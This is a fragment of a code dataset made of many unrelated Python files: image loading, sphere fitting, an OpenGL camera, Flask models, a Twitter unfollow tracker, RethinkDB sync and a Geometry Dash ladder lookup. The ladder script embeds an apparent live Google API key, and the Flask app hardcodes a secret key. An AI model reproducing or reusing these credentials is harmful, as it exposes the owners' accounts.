crops = ((0, 1024), (lower, lower + 301))\n else:\n crops = ((0, 1024), (0, 301))\n combined_cropped = combined[:, crops[0][0]:crops[0][1], crops[1][0]:crops[1][1]]\n else:\n combined_cropped = combined[:, crop_x_lower:crop_x_upper, crop_y_lower:crop_y_upper]\n combined_cropped = np.moveaxis(combined_cropped, 0, -1)\n\n combined_PIL = ToPILImage()(combined_cropped)\n if self.val:\n transformed = ToTensor()(combined_PIL)\n else:\n transformed = self.transform(combined_PIL)\n if self.phase:\n i = 2\n else:\n i = 1\n input_image = transformed[0:i, :, :]\n reference_image = transformed[i:i + i, :, :]\n\n return input_image, reference_image\n else:\n if input_image.shape[2] != 301:\n lower = int((input_image.shape[2] - 301) / 2)\n crops = ((0, 1024), (lower, lower + 301))\n else:\n crops = ((0, 1024), (0, 301))\n if self.phase:\n cropped = input_image[:, crops[0][0]:crops[0][1], crops[1][0]:crops[1][1]]\n cropped = np.moveaxis(cropped, 0, -1)\n else:\n cropped = input_image[crops[0][0]:crops[0][1], crops[1][0]:crops[1][1]]\n cropped_PIL = ToPILImage()(cropped)\n input_image = self.transform(cropped_PIL)\n\n return input_image\n\n def __len__(self) -> int:\n return len(self.input_images_amp)\n","sub_path":"ImageLoader.py","file_name":"ImageLoader.py","file_ext":"py","file_size_in_byte":7973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"130676037","text":"\n\nfrom xai.brain.wordbase.verbs._erupt import _ERUPT\n\n#calss header\nclass _ERUPTED(_ERUPT, ):\n\tdef __init__(self,): \n\t\t_ERUPT.__init__(self)\n\t\tself.name = \"ERUPTED\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"erupt\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_erupted.py","file_name":"_erupted.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"455597704","text":"import numpy as np\n\n\ndef sphereFit(sphere):\n if not isinstance(sphere, np.ndarray):\n raise TypeError('Expected numpy array.')\n if sphere.shape[1] != 3:\n raise ValueError('Expected array of shape (n, 3).')\n spX = np.array(sphere[:,0])\n spY = np.array(sphere[:,1])\n spZ = np.array(sphere[:,2])\n A = np.zeros(shape=(len(spX), 4))\n A[:,0] = spX * 2\n A[:,1] = spY * 2\n A[:,2] = spZ * 2\n A[:,3] = 1\n\n b = np.zeros((len(spX),1))\n b[:,0] = spX**2 + spY**2 + spZ**2\n x, _, _, _ = np.linalg.lstsq(A, b, rcond=None)\n\n radius = np.sqrt(x[0]**2 + x[1]**2 + x[2]**2 + x[3])[0]\n center = (x[0], x[1], x[2])\n\n return radius, center\n\ndef calcRMS(radius, center, sphere):\n Ri = np.sqrt((sphere[:,0] - center[0])**2 + (sphere[:,1] - center[1])**2 + (sphere[:,2] - center[2])**2)\n return sum(abs(Ri - radius)) / Ri.size","sub_path":"Python/SphereFit.py","file_name":"SphereFit.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"112790051","text":"\"\"\"code that is repeated in all kind of scenes\"\"\"\nfrom glfw import *\nfrom OpenGL.GL import *\nimport numpy as np\n\nimport camera\nimport glm\nfrom gl_utils import initialize_glfw\nimport camera\n\ncam1 = camera.Camera(position=glm.vec3(0, 2, 5))\ndelta_time = 0.\nlast_frame_time = 0.\nlast_mouse_x = 300.\nlast_mouse_y = 300.\nfirst_mouse = True\nkeys = [False] * 1024\ntime = 0.\n\n\n# User input\ndef key_callback(win, key, scancode, action, mods):\n global keys\n\n if key == GLFW_KEY_ESCAPE and action == GLFW_PRESS:\n glfwSetWindowShouldClose(win, True)\n\n if action == GLFW_PRESS:\n keys[key] = True\n elif action == GLFW_RELEASE:\n keys[key] = False\n\n\ndef mouse_callback(win, mouse_x, mouse_y):\n global last_mouse_x, last_mouse_y\n global first_mouse\n\n if first_mouse:\n first_mouse = False\n last_mouse_x = mouse_x\n last_mouse_y = mouse_y\n\n offset_x = mouse_x - last_mouse_x\n offset_y = last_mouse_y - mouse_y # invert y\n\n last_mouse_x = mouse_x\n last_mouse_y = mouse_y\n\n cam1.process_mouse_movement(offset_x, offset_y)\n\n\ndef scroll_callback(win, offset_x, offset_y):\n cam1.process_mouse_scroll(offset_y)\n\n\ndef move_camera():\n global cam1, delta_time, keys\n\n if keys[GLFW_KEY_W]:\n cam1.process_keyboard(camera.Movement.forward, delta_time)\n if keys[GLFW_KEY_S]:\n cam1.process_keyboard(camera.Movement.backward, delta_time)\n if keys[GLFW_KEY_A]:\n cam1.process_keyboard(camera.Movement.left, delta_time)\n if keys[GLFW_KEY_D]:\n cam1.process_keyboard(camera.Movement.right, delta_time)\n if keys[GLFW_KEY_R]:\n cam1.process_keyboard(camera.Movement.up, delta_time)\n if keys[GLFW_KEY_F]:\n cam1.process_keyboard(camera.Movement.down, delta_time)\n if keys[GLFW_KEY_LEFT]:\n cam1.process_keyboard(camera.Movement.turn_left, delta_time)\n if keys[GLFW_KEY_RIGHT]:\n cam1.process_keyboard(camera.Movement.turn_right, delta_time)\n if keys[GLFW_KEY_UP]:\n cam1.process_keyboard(camera.Movement.turn_up, delta_time)\n if keys[GLFW_KEY_DOWN]:\n cam1.process_keyboard(camera.Movement.turn_down, delta_time)\n\nwindow = initialize_glfw(width=800, height=800,\n key_callback=key_callback, mouse_callback=mouse_callback,\n scroll_callback=scroll_callback)\n\n\n# glfwSetInputMode(window, GLFW_CURSOR, GLFW_CURSOR_DISABLED)\nw, h = glfwGetFramebufferSize(window)\nglViewport(0, 0, w, h)\n# glDepthRange(-10, 10)\n\nglEnable(GL_DEPTH_TEST) # draw only if the shape is closer to the viewer\nglDepthFunc(GL_LESS) # smaller means closer\n# glPolygonMode(GL_FRONT_AND_BACK, GL_LINE) # Wireframe\n\n\ndef update():\n global time, last_frame_time, delta_time\n global view, projection\n\n time = glfwGetTime()\n delta_time = time - last_frame_time\n last_frame_time = time\n glfwPollEvents()\n move_camera()\n\n glClearColor(0., 0., 0., 1.0)\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n\n # Set viewpoint\n # View via rotating camera\n # rad = 3.\n # view = glm.look_at(pos=glm.vec3(np.sin(time)*rad, 1.5, np.cos(time)*rad), target=glm.vec3(0, 0, 0))\n # projection = glm.create_perspective_projection_matrix(45., 600. / 600., .1, 100.0, dtype=np.float32)\n\n # View via user-controlled camera object\n view = cam1.get_view_matrix()\n projection = glm.create_perspective_projection_matrix(cam1.fov, 600. / 600., .1, 100.0, dtype=np.float32)\n # projection = glm.create_orthogonal_projection_matrix(-3, 3, -3, 3, 0.1, 100, dtype=np.float32)\n","sub_path":"engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":3547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"361791525","text":"\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\n\ndb = SQLAlchemy()\n\napp = Flask(__name__)\napp.secret_key = 'SUNDERED'\n\nclass Tribe(db.Model):\n\t\"\"\"Indigeneous peoples in North America\"\"\"\n\n\t__tablename__ = 'tribes'\n\n\ttribe_id = db.Column(db.Integer(), autoincrement=True, primary_key=True)\n\tname = db.Column(db.String(), nullable=True, unique=True)\n\tregion = db.Column(db.String(), nullable=True)\n\tdescription = db.Column(db.String(), nullable=True)\n\tlanguage_id = db.Column(db.Integer(), db.ForeignKey('languages.language_id'))\n\t\n\tdef __repr__(self):\n\n\t\treturn f''\n\n\nclass Language(db.Model):\n\t\"\"\"Languages of North America\"\"\"\n\n\t__tablename__ = 'languages'\n\n\tlanguage_id = db.Column(db.Integer(), autoincrement=True, primary_key=True)\n\tlanguage_name = db.Column(db.String(), nullable=True, unique=True)\n\tlanguage_family = db.Column(db.String(), nullable=True)\n\n\n\tdef __repr__(self):\n\n\t\treturn f''\n\n\ndef connect_to_db(app):\n\n\tapp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql:///kindred'\n\tapp.config['SQLALCHEMY_ECHO'] = True\n\tapp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\n\tdb.app = app\n\tdb.init_app(app)\n\n\nif __name__ == \"__main__\":\n\n\tfrom server import app\n\tconnect_to_db(app, 'kindred')\n\tprint('Connected to database.')","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"142314084","text":"from turtle import *\nclass Venta:\n def __init__(self, venta, perdida, ganancia):\n self.venta, self.perdida, self.ganancia = venta, 100-perdida, 100+ganancia\n self.precio_uno, self.precio_dos = (self.venta*100)/self.perdida, (self.venta*100)/self.ganancia\n def resultado(self):\n self.resultado_perdida = self.precio_uno-self.venta\n self.resultado_ganancia = self.venta-self.precio_dos\n self.resultado = self.resultado_perdida - self.resultado_ganancia\nsetup(600,600)\npu()\ngoto(-100,100)\npd()\nventa = int(numinput('Venta', 'Venta de ambas'))\nperdida = int(numinput('Perdida', 'Porcentaje perdido'))\nganancia = int(numinput('Ganancia', 'Porcentaje ganado'))\nVenta = Venta(venta, perdida, ganancia)\npu()\ngoto(-100,90)\npd()\nVenta.resultado()\nif Venta.resultado_perdida > Venta.resultado_ganancia:\n write('Hubo perdida de: ')\nelse:\n write('Hubo ganancia de: ')\npu()\ngoto(-100,80)\npd()\nwrite(Venta.resultado)\nexitonclick()\n","sub_path":"first/third/computadoras.py","file_name":"computadoras.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"5456282","text":"import sys\ninput = sys.stdin.readline\n\nn = int(input())\np = list(map(int,input().split()))\n\nresult = 0\np.sort()\n\nfor i in range(n):\n for j in range(i+1):\n result += p[j]\n\nprint(result)\n","sub_path":"boj(baekjoon)/boj_11399(2).py","file_name":"boj_11399(2).py","file_ext":"py","file_size_in_byte":195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"339475071","text":"#!/usr/bin/python3\n#\n# Copyright (c) 2019-2021 Ruben Perez Hidalgo (rubenperez038 at gmail dot com)\n#\n# Distributed under the Boost Software License, Version 1.0. (See accompanying\n# file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)\n#\n\nfrom sys import argv\nfrom subprocess import check_call\nfrom os import chdir, path\n\nREPO_BASE = path.abspath(path.join(path.dirname(__file__), '..'))\n\nBASE_CONFIG = {\n 'CMAKE_PREFIX_PATH': '/opt/boost-latest',\n 'CMAKE_INSTALL_PREFIX': '/tmp/boost_mysql'\n}\n\nCLANG_CONFIG = {\n 'CMAKE_C_COMPILER': 'clang',\n 'CMAKE_CXX_COMPILER': 'clang++'\n}\n\nALL_CONFIGS = {\n 'gcc-7': {\n **BASE_CONFIG,\n 'CMAKE_C_COMPILER': 'gcc-7',\n 'CMAKE_CXX_COMPILER': 'g++-7',\n 'CMAKE_BUILD_TYPE': 'Debug'\n },\n 'clang-debug': {\n **BASE_CONFIG,\n **CLANG_CONFIG,\n 'CMAKE_BUILD_TYPE': 'Debug'\n },\n 'clang-release': {\n **BASE_CONFIG,\n **CLANG_CONFIG,\n 'CMAKE_BUILD_TYPE': 'Release'\n },\n 'clang10-debug': {\n **BASE_CONFIG,\n 'CMAKE_C_COMPILER': 'clang-10',\n 'CMAKE_CXX_COMPILER': 'clang++-10',\n 'CMAKE_BUILD_TYPE': 'Debug'\n },\n 'install': {\n **BASE_CONFIG,\n 'BUILD_TESTING': 'OFF'\n }\n}\n\ndef usage():\n print('{} '.format(argv[0]))\n print('Available configs:')\n for name in ALL_CONFIGS.keys():\n print(' ' + name)\n exit(1)\n \ndef cmd(args):\n print(' + ' + ' '.join(args))\n check_call(args)\n\ndef main():\n if len(argv) != 2:\n usage()\n cfg_name = argv[1]\n cfg = ALL_CONFIGS.get(cfg_name)\n if cfg is None:\n usage()\n\n build_dir = 'build-{}'.format(cfg_name)\n cmake_args = ['-D{}={}'.format(key, value) for key, value in cfg.items()]\n chdir(REPO_BASE)\n cmd(['rm', '-rf', build_dir])\n cmd(['mkdir', build_dir])\n chdir(build_dir)\n cmd(['cmake'] + cmake_args + ['..'])\n cmd(['make', '-j4', 'install', 'test'])\n\nif __name__ == '__main__':\n main()\n","sub_path":"tools/build_all.py","file_name":"build_all.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"231481338","text":"import serial\nimport time\n\n# function to print out the weights\ndef GetBalanceWeight(port, bal_type):\n weight = 0.0\n count = 0\n # try until you can find a reasonable value\n while True:\n # distinguish the balance type\n if(bal_type == \"OB\"):\n port.write(\"IP\\r\\n\")\n read_data = port.readline()\n floa_data = read_data\n elif(bal_type == \"SB\"):\n port.write(\"\\x1BP\\r\\n\".encode())\n read_data = port.readline().decode('UTF-8')\n # convert read_data to float\n floa_data = \"\"\n for i in read_data:\n if((i==\"+\") or (i==\"-\") or (i==\".\") or (i>=\"0\" and i<=\"9\")):\n floa_data += i\n else:\n print(\"No such balance type\")\n read_data = \"0.0\"\n floa_data = \"0.0\"\n try:\n weight = float(floa_data)\n break\n except:\n print(\"Accepted string \", read_data, \"is formatted to \", floa_data)\n print(\"There is something wrong with the reading, try again in 0.2 second...\")\n count += 1\n time.sleep(0.2)\n if count > 2:\n weight = -1.0\n break\n return weight\n","sub_path":"python/rs232/balance_weight.py","file_name":"balance_weight.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"283112072","text":"\nimport time\n\ni = 10\nprint(\"Preparados para el despegue:\")\ntime.sleep(1)\nwhile i >= 0:\n print(i)\n i -= 1\n if i == 1:\n print(\"Arrancando propulsores\")\n time.sleep(1)\n if i == 0:\n print(\"Despegue\")\n\nelse:\n print(\"La cuenta a terminado\")","sub_path":"ejercicio3whileelse.py","file_name":"ejercicio3whileelse.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"49754614","text":"# Copyright 2019 Contributors to Hyperledger Sawtooth\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# -----------------------------------------------------------------------------\n\"\"\" Syncs the blockchain state to RethinkDB\n\"\"\"\nimport sys\nimport rethinkdb as r\nfrom rbac.common import addresser\nfrom rbac.common.util import bytes_from_hex\nfrom rbac.ledger_sync.deltas.decoding import TABLE_NAMES\nfrom rbac.common.logs import get_default_logger\n\nLOGGER = get_default_logger(__name__)\n\n\ndef get_updater(conn, block_num):\n \"\"\" Returns an updater function, which can be used to update the database\n appropriately for a particular address/data combo.\n \"\"\"\n return lambda adr, rsc: _update(conn, block_num, adr, rsc)\n\n\ndef _update_state(conn, block_num, address, resource):\n \"\"\" Update the state, state_history and metadata tables\n \"\"\"\n try:\n # update state table\n now = r.now()\n address_parts = addresser.parse(address)\n address_binary = bytes_from_hex(address)\n object_id = bytes_from_hex(address_parts.object_id)\n object_type = address_parts.object_type.value\n related_id = bytes_from_hex(address_parts.related_id)\n related_type = address_parts.related_type.value\n relationship_type = address_parts.relationship_type.value\n\n data = {\n \"address\": address_binary,\n \"object_type\": object_type,\n \"object_id\": object_id,\n \"related_type\": related_type,\n \"relationship_type\": relationship_type,\n \"related_id\": related_id,\n \"block_created\": int(block_num),\n \"block_num\": int(block_num),\n \"updated_date\": now,\n **resource,\n }\n delta = {\"block_num\": int(block_num), \"updated_at\": now, **resource}\n\n query = (\n r.table(\"state\")\n .get(address_binary)\n .replace(\n lambda doc: r.branch(\n # pylint: disable=singleton-comparison\n (doc == None), # noqa\n r.expr(data),\n doc.merge(delta),\n ),\n return_changes=True,\n )\n )\n\n result = query.run(conn)\n\n if result[\"errors\"] > 0:\n LOGGER.warning(\"error updating state table:\\n%s\\n%s\", result, query)\n if result[\"replaced\"] and \"changes\" in result and result[\"changes\"]:\n query = r.table(\"state_history\").insert(result[\"changes\"][0][\"old_val\"])\n result = query.run(conn)\n # data[\"address\"] = [address_binary, int(block_num)]\n if result[\"errors\"] > 0:\n LOGGER.warning(\n \"error updating state_history table:\\n%s\\n%s\", result, query\n )\n\n if not related_id:\n data[\"address\"] = address_binary\n del data[\"related_type\"]\n del data[\"relationship_type\"]\n del data[\"related_id\"]\n query = (\n r.table(\"metadata\")\n .get(address_binary)\n .replace(\n lambda doc: r.branch(\n # pylint: disable=singleton-comparison\n (doc == None), # noqa\n r.expr(data),\n doc.merge(delta),\n )\n )\n )\n result = query.run(conn)\n if result[\"errors\"] > 0:\n LOGGER.warning(\"error updating metadata record:\\n%s\\n%s\", result, query)\n\n except Exception as err: # pylint: disable=broad-except\n LOGGER.warning(\"update_state %s error:\", type(err))\n LOGGER.warning(err)\n\n\ndef _update_legacy(conn, block_num, address, resource, data_type):\n \"\"\" Update the legacy sync tables (expansion by object type name)\n \"\"\"\n try:\n data = {\n \"id\": address,\n \"start_block_num\": int(block_num),\n \"end_block_num\": int(sys.maxsize),\n **resource,\n }\n\n query = (\n r.table(TABLE_NAMES[data_type])\n .get(address)\n .replace(\n lambda doc: r.branch(\n # pylint: disable=singleton-comparison\n (doc == None), # noqa\n r.expr(data),\n doc.merge(resource),\n )\n )\n )\n result = query.run(conn)\n if result[\"errors\"] > 0:\n LOGGER.warning(\"error updating legacy state table:\\n%s\\n%s\", result, query)\n\n except Exception as err: # pylint: disable=broad-except\n LOGGER.warning(\"_update_legacy %s error:\", type(err))\n LOGGER.warning(err)\n\n\ndef _update(conn, block_num, address, resource):\n \"\"\" Handle the update of a given address + resource update\n \"\"\"\n data_type = addresser.get_address_type(address)\n pre_filter(resource)\n\n _update_state(conn, block_num, address, resource)\n\n if data_type in TABLE_NAMES:\n _update_legacy(conn, block_num, address, resource, data_type)\n\n\ndef pre_filter(resource):\n \"\"\" Filter or modifies values prior to writing them to the rethink sync tables\n 1. Changes dates from Int64 to a DateTime (Int64 would otherwise get translated to a string)\n \"\"\"\n keys = [key for key in resource]\n for key in keys:\n if key.endswith(\"_date\"):\n try:\n value = resource[key]\n if value and int(value) != 0:\n resource[key] = r.epoch_time(int(value))\n else:\n del resource[key]\n except Exception: # pylint: disable=broad-except\n del resource[key]\n","sub_path":"rbac/ledger_sync/deltas/updating.py","file_name":"updating.py","file_ext":"py","file_size_in_byte":6176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"616599190","text":"# -*- coding: utf-8 -*-\nimport os, datetime, time, sys, json\nfrom pytz import timezone\nfrom django.core.management.base import BaseCommand\nfrom app.models import Account, Key\nfrom requests_oauthlib import OAuth1Session\n\n\nclass RateLimitError(Exception):\n \"\"\" \"\"\"\n\n\nclass AccountNotFoundError(Exception):\n \"\"\" \"\"\"\n\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n\n self.twitter_session = None\n self.api_limit_id = 15 \n self.api_limit_user = 900\n self.api_limit_dm = 1\n\n # make sesison\n CK, CS, AT, ATS = self.load_keys()\n self.make_twitter_session(CK, CS, AT, ATS)\n\n self.user_id = self.get_user_id()\n\n # get current(old) user id list from db & new user id list from api\n old_id_list = self.get_old_id_list()\n new_id_list = self.get_follower_id_list()\n\n # find removed user & new user\n removed_id_list = list(set(old_id_list) - set(new_id_list))\n new_id_list = list(set(new_id_list) - set(old_id_list))\n\n self.handle_removed_accounts(removed_id_list)\n self.handle_new_accounts(new_id_list)\n\n self.update_user_profile_until_rate_limit()\n\n return\n\n def load_keys(self):\n CK = str(Key.objects.get(key='consumer_key').value)\n CS = str(Key.objects.get(key='consumer_secret').value)\n AT = str(Key.objects.get(key='access_token').value)\n ATS = str(Key.objects.get(key='access_token_secret').value)\n return CK, CS, AT, ATS\n\n def make_twitter_session(self, CK, CS, AT, ATS):\n oauth_session = OAuth1Session(CK, CS, AT, ATS)\n self.twitter_session = oauth_session\n \n def get_user_id(self):\n endpoint = \"https://api.twitter.com/1.1/account/verify_credentials.json\"\n res = self.twitter_session.get(endpoint)\n\n if res.status_code == 200:\n response = json.loads(res.text)\n return response[\"id\"]\n else:\n raise ValueError(\"API failed: status code: \" + str(res.statsu_code))\n\n def get_old_id_list(self):\n following_accounts = Account.objects.filter(followed_you=True)\n old_id_list = [ int(account.user_id) for account in following_accounts ]\n return old_id_list\n\n def get_follower_id_list(self):\n\n if self.api_limit_id <= 0:\n raise RateLimitError\n\n endpoint = \"https://api.twitter.com/1.1/followers/ids.json\"\n params = {}\n res = self.twitter_session.get(endpoint, params=params)\n\n # ToDo: Cursor対応, 5000超えたら\n if res.status_code == 200:\n response_json = json.loads(res.text)\n id_list = response_json[\"ids\"]\n self.api_limit_id = int(res.headers[\"x-rate-limit-remaining\"])\n return id_list\n elif res.status_code == 429:\n self.api_limit_id = 0\n raise RateLimitError\n else:\n raise ValueError(\"API failed: status code: \" + str(res.statsu_code))\n\n def get_user_profile(self, user_id):\n\n if self.api_limit_user <= 0:\n raise RateLimitError\n\n endpoint = \"https://api.twitter.com/1.1/users/show.json\"\n params = {\n \"user_id\": user_id\n }\n res = self.twitter_session.get(endpoint, params=params)\n\n if res.status_code == 200:\n response = json.loads(res.text)\n self.api_limit_user = int(res.headers[\"x-rate-limit-remaining\"])\n return response\n elif res.status_code == 429:\n self.api_limit_user = 0\n raise RateLimitError\n elif res.status_code == 404:\n raise AccountNotFoundError\n else:\n raise ValueError(\"API failed: status code: \" + str(res.statsu_code))\n\n def handle_removed_accounts(self, removed_id_list):\n\n for removed_user_id in removed_id_list:\n removed_account = Account.objects.get(user_id=removed_user_id)\n removed_account.followed_you = False\n removed_account.unfollow_datetime = datetime.datetime.now(timezone('Asia/Tokyo'))\n removed_account.save()\n\n message = \"REMOVED: {} ({}) \\nhttps://twitter.com/{}\".format(\n removed_account.name,\n removed_account.screen_name,\n removed_account.screen_name\n )\n try:\n self.post_direct_message(message)\n except RateLimitError:\n continue\n\n def handle_new_accounts(self, new_id_list):\n\n for new_user_id in new_id_list:\n new_account, is_created = Account.objects.get_or_create(user_id=new_user_id)\n new_account.followed_you = True\n new_account.follow_datetime = datetime.datetime.now(timezone('Asia/Tokyo'))\n new_account.save()\n\n try:\n self.update_user_profile(new_account)\n message = \"NEW FOLLOWER: {} ({}) https://twitter.com/{}\".format(\n new_account.name,\n new_account.screen_name,\n new_account.screen_name\n )\n self.post_direct_message(message)\n\n except RateLimitError:\n continue\n\n def update_user_profile(self, account):\n\n try:\n profile = self.get_user_profile(account.user_id)\n account.profile_updated_datetime = datetime.datetime.now(timezone('Asia/Tokyo'))\n account.screen_name = profile.get(\"screen_name\", \"\")\n account.name = profile.get(\"name\", \"\")\n account.description = profile.get(\"description\", \"\")\n account.followers_count = profile.get(\"followers_count\", 0)\n account.friends_count = profile.get(\"friends_count\", 0)\n account.location = profile.get(\"location\", \"\")\n account.created_at = profile.get(\"created_at\", \"\")\n account.save()\n\n except AccountNotFoundError:\n account.profile_updated_datetime = datetime.datetime.now(timezone('Asia/Tokyo'))\n account.deleted = True\n account.followed_you = False\n account.save()\n\n def update_user_profile_until_rate_limit(self):\n\n accounts = Account.objects.filter(deleted=False).order_by(\"-profile_updated_datetime\")\n for account in accounts:\n try:\n self.update_user_profile(account)\n except RateLimitError:\n break\n\n def post_direct_message(self, message):\n\n if self.api_limit_dm <= 0:\n raise RateLimitError\n\n endpoint = \"https://api.twitter.com/1.1/direct_messages/events/new.json\"\n data = {\n \"event\": {\n \"type\": \"message_create\",\n \"message_create\": {\n \"target\": {\n \"recipient_id\": self.user_id,\n },\n \"message_data\": {\n \"text\": message\n }\n }\n }\n }\n headers = {\n \"content-type\": \"application/json\"\n }\n res = self.twitter_session.post(endpoint, json=data, headers=headers)\n\n if res.status_code == 200:\n # self.api_limit_dm = int(res.headers[\"x-rate-limit-remaining\"])\n pass\n elif res.status_code == 429:\n self.api_limit_dm = 0\n raise RateLimitError\n else:\n raise ValueError(\"API failed: status code: \" + str(res.status_code))\n","sub_path":"app/management/commands/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":7467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"393476645","text":"# Written for GD Demon Ladder\n# by RFMX (c) 2021\n\n# This script will return level data after you inputted the ID into levels.html\n# I wrote this on repl.it so I did not bother on line length lulz\n# Comments refer to the previous line except for headers, marked with *\n\n# Basic flow:\n# 1) make a HTTP request (Ajax call) to get data in column E of the list, which is a list of IDs of demons\n# 2) find where the desired ID is through the index() function and save that into a variable\n# 3) make a HTTP request again to get data in the row the demon is in\n# 4) extract data by utilising the arrangement of the data in the row and print it into the table\n\n# ** Setup **\n\n# * Import libraries *\nfrom browser import document, ajax, html\nimport json\n\n# * Changing variables *\nkey = 'AIzaSyC5EjLYGlY6W6zfkcQiQ6nK74zk_7yEjHk' # API key\ndefault_demon = '69274427' # Demon for no input, usually weekly\n\ndef on_complete(req):\t\n\t# ** extract for ID **\n\ttry: id_search = str(document.query['id']) # extract ID\n\texcept: id_search = default_demon # if ID parameter does not exist\n\n\t# * Load ID list *\n\tr_json = json.loads(req.text) # convert to json\n\tr_json = r_json['values'] # extract the values section\n\n\t# r_json is now an array of IDs with index that is OFF BY ONE compared to row number\n\n\t# ** search for the specific ID **\n\tid_array = []\n\tid_array.append(id_search)\n\ttry:\n\t\tdemon_no = r_json.index(id_array)\n\texcept: demon_no = -1\n\trow_no = demon_no + 1\n\n\t# ** URL setup **\n\trow_select = \"'The List'!\" + str(row_no) + \":\" + str(row_no)\n\tapiurl = \"https://sheets.googleapis.com/v4/spreadsheets/1xaMERl70vzr8q9MqElr4YethnV15EOe8oL1UV9LLljc/values/\" + row_select + \"?key=\" + key\n\n\t# ** Ajax call setup **\n\tif demon_no != -1:\n\t\tcall = ajax.ajax()\n\t\tcall.bind('complete', on_complete2)\n\t\tcall.open('GET', apiurl, True)\n\t\tcall.send()\n\telse:\n\t\tdocument['levelname'] <= 'There is no demon with the ID ' + str(document.query['id']) + '!'\n\n# ** the on_complete function **\n# the on_complete function executes after all the code is executed, which is a problem because I need to extract data from the Ajax call\n# ===OBSOLETE=== thankfully I only need to extract web data once from the json file and once from the web so I am throwing a lot of stuff into the on_complete function\n# I have migrated into having two Ajax call in a single script because this removes the need for me to constantly update the file\n\ndef on_complete2(req):\n\tr_json = json.loads(req.text) # converts to JSON\n\tr_json = r_json['values'] # extracts values\n\tr_json = r_json[0] # get into the array\n\t# sheets API always sort by ROWS as the major dimension\n\n\t# ** prints stuff on screen **\n\t# index is based on column oreder\n\tdocument['levelname'] <= r_json[0] + ' ('\n\tgdbrowser_url = 'https://gdbrowser.com/' + r_json[4]\n\tdocument['levelname'] <= html.A(r_json[4], href=gdbrowser_url, target=\"_blank\")\n\tdocument['levelname'] <= ')'\n\tdocument['levelcreator'] <= r_json[1]\n\tdocument['levelsong'] <= r_json[2]\n\tdocument['leveldiff'] <= r_json[3]\n\tif r_json[5] != \"unrated\":\n\t\tdocument['leveltier'] <= 'Tier ' + r_json[5] + ' (' + r_json[6] + ' corr to 2 d.p.)'\n\t\t# document['levelratings'] <= 'Submitted ratings:'\n\t\t# document['levelratings'] <= html.BR()\n\t\ti = 7\n\t\ttry:\n\t\t\twhile r_json[i] != '':\n\t\t\t\tlevelratings = ''\n\t\t\t\tlevelratings = ''.join([levelratings,'- Tier ',r_json[i]])\n\t\t\t\ti = i + 1\n\t\t\t\tlevelratings = ''.join([levelratings,' by ',r_json[i]])\n\t\t\t\ti = i + 1\n\t\t\t\tdocument['levelratings'] <= levelratings\n\t\t\t\tdocument['levelratings'] <= html.BR()\n\t\texcept: pass\n\telse: document['leveltier'] <= 'Not rated with a tier (yet)'\n\n# ** Ajax call setup **\nfirstcallurl = \"https://sheets.googleapis.com/v4/spreadsheets/1xaMERl70vzr8q9MqElr4YethnV15EOe8oL1UV9LLljc/values/'The List'!E:E?key=\" + key\n\ncall = ajax.ajax()\ncall.bind('complete', on_complete)\ncall.open('GET', firstcallurl, True)\ncall.send()\n\n","sub_path":"scripts/leveldata.py","file_name":"leveldata.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"78648717","text":"# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n\"\"\"\nClick on any random clickable element on a page.\nAlso demonstrates the use of postload_callbacks.\n\"\"\"\n\nfrom functools import partial\nfrom random import choice, random\n\nimport webtraversallibrary as wtl\nfrom webtraversallibrary.actions import Click, Refresh\n\nfrom .util import 